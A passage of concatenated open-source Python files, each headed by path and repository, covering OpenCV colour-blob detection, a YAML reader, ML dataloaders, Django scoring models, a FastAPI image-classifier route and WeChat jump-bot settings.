color_range: types.ColorRange) -> Optional[types.Blob]:
"""Find the largest blob matching the YUV color range.
Args:
yuv_image: An image in YUV color space.
color_range: The YUV color range used for segmentation.
Returns:
If found, the (u, v) coordinate of the barycenter and the contour of the
segmented blob. Otherwise returns `None`.
"""
# Threshold the image in YUV color space.
lower = color_range.lower
upper = color_range.upper
mask = cv2.inRange(yuv_image.copy(), lower, upper)
# Find contours.
_, contours, _ = cv2.findContours(
image=mask, mode=cv2.RETR_EXTERNAL, method=cv2.CHAIN_APPROX_SIMPLE)
if not contours:
return None
# Find the largest contour.
max_area_contour = max(contours, key=cv2.contourArea)
# If the blob's area is too small, ignore it.
correction_factor = np.square(1. / self._scale)
normalized_area = cv2.contourArea(max_area_contour) * correction_factor
if normalized_area < self._min_area:
return None
# Compute the centroid.
moments = cv2.moments(max_area_contour)
if moments["m00"] == 0:
return None
cx, cy = moments["m10"] / moments["m00"], moments["m01"] / moments["m00"]
return types.Blob(center=np.array([cx, cy]), contour=max_area_contour)
def _draw_blobs(self, image: np.ndarray, blob: types.Blob) -> np.ndarray:
"""Draws the controuer of the detected blobs."""
frame = image.copy()
if blob:
# Draw center.
cv2.drawMarker(
img=frame,
position=(int(blob.center[0]), int(blob.center[1])),
color=(255, 0, 0),
markerType=cv2.MARKER_CROSS,
markerSize=7,
thickness=1,
line_type=cv2.LINE_AA)
# Draw contours.
cv2.drawContours(
image=frame,
contours=[blob.contour],
contourIdx=0,
color=(0, 0, 255),
thickness=1)
return frame
def _callback_change_color(self, color_index: int) -> None:
"""Callback for YUV GUI toolkit trackbar.
Reads current trackbar value and selects the associated color.
The association between index and color is implementation dependent, i.e.
in the insertion order into a dictionary.
Args:
color_index: The current value of the trackbar. Passed automatically.
"""
colors = list(self._color_ranges.keys())
selected_color = colors[color_index]
min_upper = self._color_ranges[selected_color]
lower = min_upper.lower
upper = min_upper.upper
self._u_range_trackbar.set_trackbar_pos(lower[1], upper[1])
self._v_range_trackbar.set_trackbar_pos(lower[2], upper[2])
cv2.setWindowTitle(self._window_name,
self._window_name + " - Color: " + selected_color)
def _update_gui_toolkit(self, image_yuv: np.ndarray,
image_rgb: np.ndarray) -> None:
"""Updates the YUV GUI toolkit.
Creates and shows the UV representation of the current image.
Args:
image_yuv: The current image in YUV color space.
image_rgb: The current image in RGB color space.
"""
subsample = cv2.getTrackbarPos("Subsampling", self._window_name)
img_u = image_yuv[0::subsample, 0::subsample, 1]
img_v = 1.0 - image_yuv[0::subsample, 0::subsample, 2]
pixel_color = image_rgb[0::subsample, 0::subsample, :]
pixel_color = pixel_color.reshape(np.prod(img_u.shape[0:2]), -1)
img_u = img_u.ravel()
img_v = img_v.ravel()
fig_size = 300
fig = np.full(shape=(fig_size, fig_size, 3), fill_value=255, dtype=np.uint8)
cv2.arrowedLine(
img=fig,
pt1=(0, fig_size),
pt2=(fig_size, fig_size),
color=(0, 0, 0),
thickness=2,
tipLength=0.03)
cv2.arrowedLine(
img=fig,
pt1=(0, fig_size),
pt2=(0, 0),
color=(0, 0, 0),
thickness=2,
tipLength=0.03)
cv2.putText(
img=fig,
text="U",
org=(int(0.94 * fig_size), int(0.97 * fig_size)),
fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=0.5,
color=(0, 0, 0),
thickness=2)
cv2.putText(
img=fig,
text="V",
org=(int(0.03 * fig_size), int(0.06 * fig_size)),
fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=0.5,
color=(0, 0, 0),
thickness=2)
for i in range(img_u.size):
color = tuple(int(p) for p in pixel_color[i, ::-1])
position = (int(img_u[i] * fig_size), int(img_v[i] * fig_size))
cv2.drawMarker(
img=fig,
position=position,
color=color,
markerType=cv2.MARKER_SQUARE,
markerSize=3,
thickness=2)
u_min, u_max = self._u_range_trackbar.get_trackbar_pos()
u_min = int(u_min * fig_size)
u_max = int(u_max * fig_size)
v_min, v_max = self._v_range_trackbar.get_trackbar_pos()
v_min = int((1.0 - v_min) * fig_size)
v_max = int((1.0 - v_max) * fig_size)
cv2.line(
img=fig,
pt1=(u_min, v_max),
pt2=(u_min, v_min),
color=(0, 0, 0),
thickness=2)
cv2.line(
img=fig,
pt1=(u_max, v_max),
pt2=(u_max, v_min),
color=(0, 0, 0),
thickness=2)
cv2.line(
img=fig,
pt1=(u_min, v_min),
pt2=(u_max, v_min),
color=(0, 0, 0),
thickness=2)
cv2.line(
img=fig,
pt1=(u_min, v_max),
pt2=(u_max, v_max),
color=(0, 0, 0),
thickness=2)
cv2.imshow(self._window_name, fig)
cv2.waitKey(1)
class CreateRangeTrackbar:
"""Class to create and control, on an OpenCV GUI, two trackbars representing a range of values."""
def __init__(self,
window_name: str,
trackbar_name_lower: str,
trackbar_name_upper: str,
color_ranges: Mapping[str, types.ColorRange],
color_code: str,
trackbar_scale: int = 1000):
"""Initializes the class.
Args:
window_name: Name of the window that will be used as a parent of the
created trackbar.
trackbar_name_lower: The name of the trackbar implementing the lower bound
of the range.
trackbar_name_upper: The name of the trackbar implementing the upper bound
of the range.
color_ranges: A mapping between a given blob name and the range of YUV
color used to segment it from an image.
color_code: The color code to change in `color_ranges`. Shall be "U" or
"V".
trackbar_scale: The trackbar scale to recover the real value from the
current trackbar position.
"""
self._window_name = window_name
self._trackbar_name_lower = trackbar_name_lower
self._trackbar_name_upper = trackbar_name_upper
self._color_ranges = color_ranges
self._color_code = color_code
self._trackbar_scale = trackbar_scale
self._trackbar_reset = False
# pylint: disable=g-long-lambda
cv2.createTrackbar(
self._trackbar_name_lower, self._window_name, 0,
self._trackbar_scale, lambda x: self._callback_update_threshold(
"lower", "lower", self._color_code, x))
cv2.createTrackbar(
self._trackbar_name_upper, self._window_name, 0,
self._trackbar_scale, lambda x: self._callback_update_threshold(
"upper", "upper", self._color_code, x))
# pylint: enable=g-long-lambda
def set_trackbar_pos(self, lower_value: float, upper_value: float) -> None:
"""Sets the trackbars to specific values."""
if lower_value > upper_value:
logging.error(
"Wrong values for setting range trackbars. Lower value "
"must be less than upper value. Provided lower: %d. "
"Provided upper: %d.", lower_value, upper_value)
return
# To change the trackbar values avoiding the consistency check enforced by
# the callback to implement a range of values with two sliders, we set the
# variable self._trackbar_reset to `True` and then bring it back to
# `False`.
self._trackbar_reset = True
cv2.setTrackbarPos(self._trackbar_name_lower, self._window_name,
int(lower_value * self._trackbar_scale))
cv2.setTrackbarPos(self._trackbar_name_upper, self._window_name,
int(upper_value * self._trackbar_scale))
self._trackbar_reset = False
def get_trackbar_pos(self, normalized: bool = True) -> Tuple[float, float]:
"""Gets the trackbars lower and upper values."""
lower = cv2.getTrackbarPos(self._trackbar_name_lower, self._window_name)
upper = cv2.getTrackbarPos(self._trackbar_name_upper, self._window_name)
if normalized:
return lower / self._trackbar_scale, upper / self._trackbar_scale
else:
return lower, upper
def _callback_update_threshold(self, lower_or_upper: str, attribute: str,
color_code: str, value: int) -> None:
"""Callback for YUV GUI toolkit trackbar.
Reads current trackbar value and updates the associated U or V threshold.
This callback assumes that two trackbars, `trackbar_name_lower` and
`trackbar_name_upper`, form a range of values. As a consequence, when one
of the two trackbar is moved, there is a consistency check that the range
is valid (i.e. lower value less than max value and vice versa).
Typical usage example:
To pass it to an OpenCV/Qt trackbar, use this function in a lambda
as follows:
cv2.createTrackbar("Trackbar lower", ..., lambda x:
class_variable._callback_update_threshold("lower", "lower", "U", x))
Args:
lower_or_upper: The behaviour of this callback for the range. Shall be
`lower` or `upper`.
attribute: The name of the threshold in `self._color_ranges` for the
current selected color.
color_code: The color code to change. Shall be "U" or "V".
value: The current value of the trackbar.
"""
if not self._trackbar_reset:
if lower_or_upper == "lower":
limiting_value = cv2.getTrackbarPos(self._trackbar_name_upper,
self._window_name)
if value > limiting_value:
cv2.setTrackbarPos(self._trackbar_name_lower, self._window_name,
limiting_value)
return
elif lower_or_upper == "upper":
limiting_value = cv2.getTrackbarPos(self._trackbar_name_lower,
self._window_name)
if value < limiting_value:
cv2.setTrackbarPos(self._trackbar_name_upper, self._window_name,
limiting_value)
return
selected_color_index = cv2.getTrackbarPos("Color selector",
self._window_name)
colors = list(self._color_ranges.keys())
selected_color = colors[selected_color_index]
updated_value = value / self._trackbar_scale
color_threshold = getattr(self._color_ranges[selected_color], attribute)
if color_code == "U":
color_threshold[1] = updated_value
elif color_code == "V":
color_threshold[2] = updated_value
else:
logging.error(
"Wrong trackbar name. No U/V color code correspondence."
"Provided: `%s`.", color_code)
return
|
dynaconf/vendor/ruamel/yaml/reader.py
|
sephiartlist/dynaconf
| 2,293 |
118884
|
from __future__ import absolute_import
_F='\ufeff'
_E='\x00'
_D=False
_C='ascii'
_B='\n'
_A=None
import codecs
from .error import YAMLError,FileMark,StringMark,YAMLStreamError
from .compat import text_type,binary_type,PY3,UNICODE_SIZE
from .util import RegExp
if _D:from typing import Any,Dict,Optional,List,Union,Text,Tuple,Optional
__all__=['Reader','ReaderError']
class ReaderError(YAMLError):
def __init__(A,name,position,character,encoding,reason):A.name=name;A.character=character;A.position=position;A.encoding=encoding;A.reason=reason
def __str__(A):
if isinstance(A.character,binary_type):return'\'%s\' codec can\'t decode byte #x%02x: %s\n in "%s", position %d'%(A.encoding,ord(A.character),A.reason,A.name,A.position)
else:return'unacceptable character #x%04x: %s\n in "%s", position %d'%(A.character,A.reason,A.name,A.position)
class Reader:
def __init__(A,stream,loader=_A):
A.loader=loader
if A.loader is not _A and getattr(A.loader,'_reader',_A)is _A:A.loader._reader=A
A.reset_reader();A.stream=stream
def reset_reader(A):A.name=_A;A.stream_pointer=0;A.eof=True;A.buffer='';A.pointer=0;A.raw_buffer=_A;A.raw_decode=_A;A.encoding=_A;A.index=0;A.line=0;A.column=0
@property
def stream(self):
try:return self._stream
except AttributeError:raise YAMLStreamError('input stream needs to specified')
@stream.setter
def stream(self,val):
B=val;A=self
if B is _A:return
A._stream=_A
if isinstance(B,text_type):A.name='<unicode string>';A.check_printable(B);A.buffer=B+_E
elif isinstance(B,binary_type):A.name='<byte string>';A.raw_buffer=B;A.determine_encoding()
else:
if not hasattr(B,'read'):raise YAMLStreamError('stream argument needs to have a read() method')
A._stream=B;A.name=getattr(A.stream,'name','<file>');A.eof=_D;A.raw_buffer=_A;A.determine_encoding()
def peek(A,index=0):
B=index
try:return A.buffer[A.pointer+B]
except IndexError:A.update(B+1);return A.buffer[A.pointer+B]
def prefix(A,length=1):
B=length
if A.pointer+B>=len(A.buffer):A.update(B)
return A.buffer[A.pointer:A.pointer+B]
def forward_1_1(A,length=1):
B=length
if A.pointer+B+1>=len(A.buffer):A.update(B+1)
while B!=0:
C=A.buffer[A.pointer];A.pointer+=1;A.index+=1
if C in'\n\x85\u2028\u2029'or C=='\r'and A.buffer[A.pointer]!=_B:A.line+=1;A.column=0
elif C!=_F:A.column+=1
B-=1
def forward(A,length=1):
B=length
if A.pointer+B+1>=len(A.buffer):A.update(B+1)
while B!=0:
C=A.buffer[A.pointer];A.pointer+=1;A.index+=1
if C==_B or C=='\r'and A.buffer[A.pointer]!=_B:A.line+=1;A.column=0
elif C!=_F:A.column+=1
B-=1
def get_mark(A):
if A.stream is _A:return StringMark(A.name,A.index,A.line,A.column,A.buffer,A.pointer)
else:return FileMark(A.name,A.index,A.line,A.column)
def determine_encoding(A):
while not A.eof and(A.raw_buffer is _A or len(A.raw_buffer)<2):A.update_raw()
if isinstance(A.raw_buffer,binary_type):
if A.raw_buffer.startswith(codecs.BOM_UTF16_LE):A.raw_decode=codecs.utf_16_le_decode;A.encoding='utf-16-le'
elif A.raw_buffer.startswith(codecs.BOM_UTF16_BE):A.raw_decode=codecs.utf_16_be_decode;A.encoding='utf-16-be'
else:A.raw_decode=codecs.utf_8_decode;A.encoding='utf-8'
A.update(1)
if UNICODE_SIZE==2:NON_PRINTABLE=RegExp('[^\t\n\r -~\x85\xa0-\ud7ff\ue000-�]')
else:NON_PRINTABLE=RegExp('[^\t\n\r -~\x85\xa0-\ud7ff\ue000-�𐀀-\U0010ffff]')
_printable_ascii=('\t\n\r'+''.join(map(chr,range(32,127)))).encode(_C)
@classmethod
def _get_non_printable_ascii(D,data):
A=data.encode(_C);B=A.translate(_A,D._printable_ascii)
if not B:return _A
C=B[:1];return A.index(C),C.decode(_C)
@classmethod
def _get_non_printable_regex(B,data):
A=B.NON_PRINTABLE.search(data)
if not bool(A):return _A
return A.start(),A.group()
@classmethod
def _get_non_printable(A,data):
try:return A._get_non_printable_ascii(data)
except UnicodeEncodeError:return A._get_non_printable_regex(data)
def check_printable(A,data):
B=A._get_non_printable(data)
if B is not _A:C,D=B;E=A.index+(len(A.buffer)-A.pointer)+C;raise ReaderError(A.name,E,ord(D),'unicode','special characters are not allowed')
def update(A,length):
if A.raw_buffer is _A:return
A.buffer=A.buffer[A.pointer:];A.pointer=0
while len(A.buffer)<length:
if not A.eof:A.update_raw()
if A.raw_decode is not _A:
try:C,E=A.raw_decode(A.raw_buffer,'strict',A.eof)
except UnicodeDecodeError as B:
if PY3:F=A.raw_buffer[B.start]
else:F=B.object[B.start]
if A.stream is not _A:D=A.stream_pointer-len(A.raw_buffer)+B.start
elif A.stream is not _A:D=A.stream_pointer-len(A.raw_buffer)+B.start
else:D=B.start
raise ReaderError(A.name,D,F,B.encoding,B.reason)
else:C=A.raw_buffer;E=len(C)
A.check_printable(C);A.buffer+=C;A.raw_buffer=A.raw_buffer[E:]
if A.eof:A.buffer+=_E;A.raw_buffer=_A;break
def update_raw(A,size=_A):
C=size
if C is _A:C=4096 if PY3 else 1024
B=A.stream.read(C)
if A.raw_buffer is _A:A.raw_buffer=B
else:A.raw_buffer+=B
A.stream_pointer+=len(B)
if not B:A.eof=True
|
myia/operations/prim_record_setitem.py
|
strint/myia
| 222 |
118915
|
<filename>myia/operations/prim_record_setitem.py
"""Definitions for the primitive `record_setitem`."""
from .. import lib, xtype
from ..lib import MyiaAttributeError, MyiaTypeError, standard_prim, typecheck
from . import primitives as P
@standard_prim(P.record_setitem)
async def infer_record_setitem(
self, engine, data: lib.AbstractClassBase, attr: xtype.String, value
):
"""Infer the return type of primitive `record_setitem`."""
attr_v = self.require_constant(attr, argnum=2)
if attr_v not in data.attributes:
raise MyiaAttributeError(f"Unknown field in {data}: {attr_v}")
model = data.user_defined_version()
expected = model.attributes[attr_v]
if not typecheck(expected, value):
raise MyiaTypeError(f"Expected field {attr_v} to have type {expected}")
return type(data)(
data.tag,
{**data.attributes, attr_v: value},
constructor=data.constructor,
)
__operation_defaults__ = {
"name": "record_setitem",
"registered_name": "record_setitem",
"mapping": P.record_setitem,
"python_implementation": None,
}
__primitive_defaults__ = {
"name": "record_setitem",
"registered_name": "record_setitem",
"type": "inference",
"python_implementation": None,
"inferrer_constructor": infer_record_setitem,
"grad_transform": None,
}
|
SimPEG/utils/curv_utils.py
|
prisae/simpeg
| 358 |
118929
|
<reponame>prisae/simpeg<gh_stars>100-1000
from discretize.utils import volTetra, indexCube, faceInfo
|
cords/utils/data/dataloader/SSL/adaptive/retrievedataloader.py
|
krishnatejakk/AUTOMATA
| 185 |
118941
|
<reponame>krishnatejakk/AUTOMATA
from .adaptivedataloader import AdaptiveDSSDataLoader
from cords.selectionstrategies.SSL import RETRIEVEStrategy
import time, copy
# RETRIEVE
class RETRIEVEDataLoader(AdaptiveDSSDataLoader):
def __init__(self, train_loader, val_loader, dss_args, logger, *args, **kwargs):
"""
Arguments assertion check
"""
assert "model" in dss_args.keys(), "'model' is a compulsory argument. Include it as a key in dss_args"
assert "tea_model" in dss_args.keys(), "'tea_model' is a compulsory argument. Include it as a key in dss_args"
assert "ssl_alg" in dss_args.keys(), "'ssl_alg' is a compulsory argument. Include it as a key in dss_args"
assert "loss" in dss_args.keys(), "'loss' is a compulsory argument. Include it as a key in dss_args"
if dss_args.loss.reduce:
raise ValueError("Please set 'reduce' of loss function to False for adaptive subset selection strategies")
assert "eta" in dss_args.keys(), "'eta' is a compulsory argument. Include it as a key in dss_args"
assert "num_classes" in dss_args.keys(), "'num_classes' is a compulsory argument for RETRIEVE. Include it as a key in dss_args"
assert "linear_layer" in dss_args.keys(), "'linear_layer' is a compulsory argument for RETRIEVE. Include it as a key in dss_args"
assert "selection_type" in dss_args.keys(), "'selection_type' is a compulsory argument for RETRIEVE. Include it as a key in dss_args"
assert "greedy" in dss_args.keys(), "'greedy' is a compulsory argument for RETRIEVE. Include it as a key in dss_args"
if dss_args.greedy == 'RGreedy':
assert "r" in dss_args.keys(), "'r' is a compulsory argument for RGreedy version of RETRIEVE. Include it as a key in dss_args"
else:
dss_args.r = 15
assert "valid" in dss_args.keys(), "'valid' is a compulsory argument for RETRIEVE. Include it as a key in dss_args"
super(RETRIEVEDataLoader, self).__init__(train_loader, val_loader, dss_args,
logger, *args, **kwargs)
self.strategy = RETRIEVEStrategy(train_loader, val_loader, copy.deepcopy(dss_args.model), copy.deepcopy(dss_args.tea_model),
dss_args.ssl_alg, dss_args.loss, dss_args.eta, dss_args.device, dss_args.num_classes,
dss_args.linear_layer, dss_args.selection_type, dss_args.greedy, logger=logger,
r = dss_args.r, valid = dss_args.valid)
self.train_model = dss_args.model
self.teacher_model = dss_args.tea_model
self.logger.debug('RETRIEVE dataloader initialized.')
def _resample_subset_indices(self):
start = time.time()
self.logger.debug('Iteration: {0:d}, requires subset selection. '.format(self.cur_iter))
cached_state_dict = copy.deepcopy(self.train_model.state_dict())
clone_dict = copy.deepcopy(self.train_model.state_dict())
if self.teacher_model is not None:
tea_cached_state_dict = copy.deepcopy(self.teacher_model.state_dict())
tea_clone_dict = copy.deepcopy(self.teacher_model.state_dict())
else:
tea_clone_dict = None
subset_indices, subset_weights = self.strategy.select(self.budget, clone_dict, tea_clone_dict)
self.train_model.load_state_dict(cached_state_dict)
if self.teacher_model is not None:
self.teacher_model.load_state_dict(tea_cached_state_dict)
end = time.time()
self.logger.info('Iteration: {0:d}, subset selection finished, takes {1:.2f}. '.format(self.cur_iter, (end - start)))
return subset_indices, subset_weights
|
src/debugpy/_vendored/pydevd/tests_python/resources/_debugger_case4.py
|
r3m0t/debugpy
| 695 |
118957
|
<filename>src/debugpy/_vendored/pydevd/tests_python/resources/_debugger_case4.py
import time
class ProceedContainer:
proceed = False
def exit_while_loop():
ProceedContainer.proceed = True
return 'ok'
def sleep():
while not ProceedContainer.proceed: # The debugger should change the proceed to True to exit the loop.
time.sleep(.1)
if __name__ == '__main__':
sleep()
print('TEST SUCEEDED')
|
gffutils/test/expected.py
|
aswarren/gffutils
| 171 |
118992
|
<gh_stars>100-1000
# expected data for tests using FBgn0031208.gff and FBgn0031208.gtf files
# list the children and their expected first-order parents for the GFF test file.
GFF_parent_check_level_1 = {'FBtr0300690':['FBgn0031208'],
'FBtr0300689':['FBgn0031208'],
'CG11023:1':['FBtr0300689','FBtr0300690'],
'five_prime_UTR_FBgn0031208:1_737':['FBtr0300689','FBtr0300690'],
'CDS_FBgn0031208:1_737':['FBtr0300689','FBtr0300690'],
'intron_FBgn0031208:1_FBgn0031208:2':['FBtr0300690'],
'intron_FBgn0031208:1_FBgn0031208:3':['FBtr0300689'],
'FBgn0031208:3':['FBtr0300689'],
'CDS_FBgn0031208:3_737':['FBtr0300689'],
'CDS_FBgn0031208:2_737':['FBtr0300690'],
'exon:chr2L:8193-8589:+':['FBtr0300690'],
'intron_FBgn0031208:2_FBgn0031208:4':['FBtr0300690'],
'three_prime_UTR_FBgn0031208:3_737':['FBtr0300689'],
'FBgn0031208:4':['FBtr0300690'],
'CDS_FBgn0031208:4_737':['FBtr0300690'],
'three_prime_UTR_FBgn0031208:4_737':['FBtr0300690'],
}
# and second-level . . . they should all be grandparents of the same gene.
GFF_parent_check_level_2 = {
'CG11023:1':['FBgn0031208'],
'five_prime_UTR_FBgn0031208:1_737':['FBgn0031208'],
'CDS_FBgn0031208:1_737':['FBgn0031208'],
'intron_FBgn0031208:1_FBgn0031208:2':['FBgn0031208'],
'intron_FBgn0031208:1_FBgn0031208:3':['FBgn0031208'],
'FBgn0031208:3':['FBgn0031208'],
'CDS_FBgn0031208:3_737':['FBgn0031208'],
'CDS_FBgn0031208:2_737':['FBgn0031208'],
'exon:chr2L:8193-8589:+':['FBgn0031208'],
'intron_FBgn0031208:2_FBgn0031208:4':['FBgn0031208'],
'three_prime_UTR_FBgn0031208:3_737':['FBgn0031208'],
'FBgn0031208:4':['FBgn0031208'],
'CDS_FBgn0031208:4_737':['FBgn0031208'],
'three_prime_UTR_FBgn0031208:4_737':['FBgn0031208'],
}
# Same thing for GTF test file . . .
GTF_parent_check_level_1 = {
'exon:chr2L:7529-8116:+':['FBtr0300689'],
'exon:chr2L:7529-8116:+_1':['FBtr0300690'],
'exon:chr2L:8193-9484:+':['FBtr0300689'],
'exon:chr2L:8193-8589:+':['FBtr0300690'],
'exon:chr2L:8668-9484:+':['FBtr0300690'],
'exon:chr2L:10000-11000:-':['transcript_Fk_gene_1'],
'exon:chr2L:11500-12500:-':['transcript_Fk_gene_2'],
'CDS:chr2L:7680-8116:+':['FBtr0300689'],
'CDS:chr2L:7680-8116:+_1':['FBtr0300690'],
'CDS:chr2L:8193-8610:+':['FBtr0300689'],
'CDS:chr2L:8193-8589:+':['FBtr0300690'],
'CDS:chr2L:8668-9276:+':['FBtr0300690'],
'CDS:chr2L:10000-11000:-':['transcript_Fk_gene_1'],
'FBtr0300689':['FBgn0031208'],
'FBtr0300690':['FBgn0031208'],
'transcript_Fk_gene_1':['Fk_gene_1'],
'transcript_Fk_gene_2':['Fk_gene_2'],
'start_codon:chr2L:7680-7682:+':['FBtr0300689'],
'start_codon:chr2L:7680-7682:+_1':['FBtr0300690'],
'start_codon:chr2L:10000-11002:-':['transcript_Fk_gene_1'],
'stop_codon:chr2L:8611-8613:+':['FBtr0300689'],
'stop_codon:chr2L:9277-9279:+':['FBtr0300690'],
'stop_codon:chr2L:11001-11003:-':['transcript_Fk_gene_1'],
}
GTF_parent_check_level_2 = {
'exon:chr2L:7529-8116:+':['FBgn0031208'],
'exon:chr2L:8193-9484:+':['FBgn0031208'],
'exon:chr2L:8193-8589:+':['FBgn0031208'],
'exon:chr2L:8668-9484:+':['FBgn0031208'],
'exon:chr2L:10000-11000:-':['Fk_gene_1'],
'exon:chr2L:11500-12500:-':['Fk_gene_2'],
'CDS:chr2L:7680-8116:+':['FBgn0031208'],
'CDS:chr2L:8193-8610:+':['FBgn0031208'],
'CDS:chr2L:8193-8589:+':['FBgn0031208'],
'CDS:chr2L:8668-9276:+':['FBgn0031208'],
'CDS:chr2L:10000-11000:-':['Fk_gene_1'],
'FBtr0300689':[],
'FBtr0300690':[],
'transcript_Fk_gene_1':[],
'transcript_Fk_gene_2':[],
'start_codon:chr2L:7680-7682:+':['FBgn0031208'],
'start_codon:chr2L:10000-11002:-':['Fk_gene_1'],
'stop_codon:chr2L:8611-8613:+':['FBgn0031208'],
'stop_codon:chr2L:9277-9279:+':['FBgn0031208'],
'stop_codon:chr2L:11001-11003:-':['Fk_gene_1'],
}
expected_feature_counts = {
'gff3':{'gene':3,
'mRNA':4,
'exon':6,
'CDS':5,
'five_prime_UTR':1,
'intron':3,
'pcr_product':1,
'protein':2,
'three_prime_UTR':2},
'gtf':{
#'gene':3,
# 'mRNA':4,
'CDS':6,
'exon':7,
'start_codon':3,
'stop_codon':3}
}
expected_features = {'gff3':['gene',
'mRNA',
'protein',
'five_prime_UTR',
'three_prime_UTR',
'pcr_product',
'CDS',
'exon',
'intron'],
'gtf':['gene',
'mRNA',
'CDS',
'exon',
'start_codon',
'stop_codon']}
|
wouso/core/scoring/models.py
|
AlexandruGhergut/wouso
| 117 |
119003
|
import logging
from datetime import datetime
from django.db import models
from django.contrib.auth.models import User
from wouso.core.common import Item, CachedItem
from wouso.core.decorators import cached_method, drop_cache
from wouso.core.game import get_games
from wouso.core.game.models import Game
class Coin(CachedItem, models.Model):
""" Different scoring categories.
A special coin is 'points' since is used for ladder and levels.
"""
CACHE_PART = 'name'
name = models.CharField(max_length=100, unique=True)
# The coin owner module, or null if is a core coin
owner = models.ForeignKey(Game, blank=True, null=True)
title = models.CharField(max_length=100)
# If the coin values are forced integers, else using float.
integer = models.BooleanField(default=False, blank=True)
def is_core(self):
""" A coin is a core coin, if it doesn't have an owner """
return self.owner is None
def format_value(self, amount):
if self.integer:
return int(round(amount))
return amount
def __unicode__(self):
return self.title or self.name
class Formula(Item, models.Model):
""" Define the way coin amounts are given to the user, based
on keyword arguments formulas.
A formula is owned by a game, or by the system (set owner to None)
"""
name = models.CharField(max_length=100, unique=True)
expression = models.CharField(max_length=1000, default='')
owner = models.ForeignKey(Game, null=True, blank=True)
description = models.CharField(max_length=500, default='')
@classmethod
def get(cls, id_string, default_string=None):
""" Performs a get lookup on the Formula table, if no formula exists
with the first id_string, returns the formula with the default_string
id.
"""
if not default_string:
return super(Formula, cls).get(id_string)
try:
formula = Formula.objects.get(name=id_string)
except cls.DoesNotExist:
formula = super(Formula, cls).get(default_string)
return formula
return formula
class History(models.Model):
""" Scoring history keeps track of scoring events per user, saving
the details from source to amount.
"""
timestamp = models.DateTimeField(default=datetime.now, blank=True)
user = models.ForeignKey(User)
game = models.ForeignKey(Game, blank=True, null=True, default=None)
# this is reserved for further use/debugging
external_id = models.IntegerField(default=0, null=True, blank=True)
formula = models.ForeignKey(Formula, blank=True, null=True, default=None)
coin = models.ForeignKey(Coin)
amount = models.FloatField(default=0)
percents = models.IntegerField(default=100)
# group same kind of bonuses together, using the same formula
tag = models.CharField(max_length=64, blank=True, null=True)
@classmethod
def add(cls, user=None, game=None, **kwargs):
ret = History.objects.create(user=user, game=game, **kwargs)
drop_cache(cls._user_points, user=user)
drop_cache(cls._user_coins, user=user)
return ret
@classmethod
def user_coins(cls, user):
return cls._user_coins(user=user)
@classmethod
def user_points(cls, user):
return cls._user_points(user=user)
@staticmethod
@cached_method
def _user_coins(user):
""" Returns a dictionary of coins and amounts for a specific user. """
allcoins = Coin.objects.all()
coins = {}
for coin in allcoins:
hs = History.objects.filter(user=user, coin=coin).aggregate(total=models.Sum('amount'))
if hs['total'] is not None:
coins[coin.name] = coin.format_value(hs['total'])
else:
if coin.is_core():
coins[coin.name] = 0
return coins
@staticmethod
@cached_method
def _user_points(user):
""" :return: a list of (game, points) - distribution of points per source """
points = {}
for game in get_games() + [None]:
pp = History.user_points_from_game(user=user, game=game, zeros=False)
if pp:
if game:
points[game.get_instance().verbose_name] = pp
else:
points['wouso'] = pp
return points
@staticmethod
def user_points_from_game(user, game, zeros=True):
# FIXME: add test
game = game.get_instance() if game else game
hs = History.objects.filter(user=user, game=game)
pp = {}
if zeros:
for c in Coin.objects.all():
pp[c.name] = 0
for h in hs:
pp[h.coin.name] = pp.get(h.coin.name, 0) + h.amount
return pp
def delete(self, using=None):
cls = self.__class__
drop_cache(cls._user_points, self.user)
drop_cache(cls._user_coins, self.user)
super(History, self).delete(using=using)
def __unicode__(self):
return "{user} {date}-{formula}[{ext}]: {amount}{coin}".format(user=self.user, date=self.timestamp, formula=self.formula, ext=self.external_id, amount=self.amount, coin=self.coin)
|
dmb/modeling/__init__.py
|
jiaw-z/DenseMatchingBenchmark
| 160 |
119004
|
from .flow.models import _META_ARCHITECTURES as _FLOW_META_ARCHITECTURES
from .stereo.models import _META_ARCHITECTURES as _STEREO_META_ARCHITECTURES
_META_ARCHITECTURES = dict()
_META_ARCHITECTURES.update(_FLOW_META_ARCHITECTURES)
_META_ARCHITECTURES.update(_STEREO_META_ARCHITECTURES)
def build_model(cfg):
meta_arch = _META_ARCHITECTURES[cfg.model.meta_architecture]
return meta_arch(cfg)
|
application/main/routers/image_classifier.py
|
willuvbb/test_fastapi_template
| 128 |
119037
|
<gh_stars>100-1000
from fastapi import File, UploadFile
from fastapi.routing import APIRouter
from application.initializer import LoggerInstance
from application.main.services.image_classification_service import ImageClassificationService
from application.main.utility.manager.image_utils import BasicImageUtils
image_classification_service = ImageClassificationService()
router = APIRouter(prefix='/image-classify')
logger = LoggerInstance().get_logger(__name__)
@router.post("/")
async def image_classification(file: UploadFile = File(...)):
extension = file.filename.split(".")[-1] in ("jpg", "jpeg", "png")
if not extension:
return "Image must be jpg or png format!"
logger.info('Image Classification')
image = await BasicImageUtils.read_image_file(await file.read(), filename=file.filename, cache=True)
image_category = await image_classification_service.classify(image)
return image_category
|
jump_bot/jumpbot/settings.py
|
beatyou/wechat_jump_game
| 17,238 |
119056
|
# Wechat Jump Bot (iOS)
# ----------------------------------------------------------------------------
import os
CURRENT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_ROOT = os.path.dirname(CURRENT_DIR)
PROJECT_DIR = "jumpbot/"
# ----------------------------------------------------------------------------
# Screenshot
DATA_DIR = "data/"
IMAGE = "screen.png"
IMAGE_DIR = PROJECT_DIR + DATA_DIR + IMAGE
# ----------------------------------------------------------------------------
# mode: ['auto', 'manual']
MODE = "manual"
# ----------------------------------------------------------------------------
# Params
def get_bot_params(model="ip"):
bot_params = {
"TIME_COEFF": 2.,
"COORD_Y_START_SCAN": 200,
"PIECE_BASE_HEIGHT_HALF": 13,
"PIECE_BODY_WIDTH": 49,
"SWIPE_X1": 375,
"SWIPE_Y1": 1055,
"SWIPE_X2": 375,
"SWIPE_Y2": 1055
}
if model == "ip":
bot_params["TIME_COEFF"] = 2.
bot_params["COORD_Y_START_SCAN"] = 200
bot_params["PIECE_BASE_HEIGHT_HALF"] = 13
bot_params["PIECE_BODY_WIDTH"] = 49
bot_params["SWIPE_X1"] = 375
bot_params["SWIPE_Y1"] = 1055
bot_params["SWIPE_X2"] = 375
bot_params["SWIPE_Y2"] = 1055
elif model == "plus":
bot_params["TIME_COEFF"] = 1.2
bot_params["COORD_Y_START_SCAN"] = 300
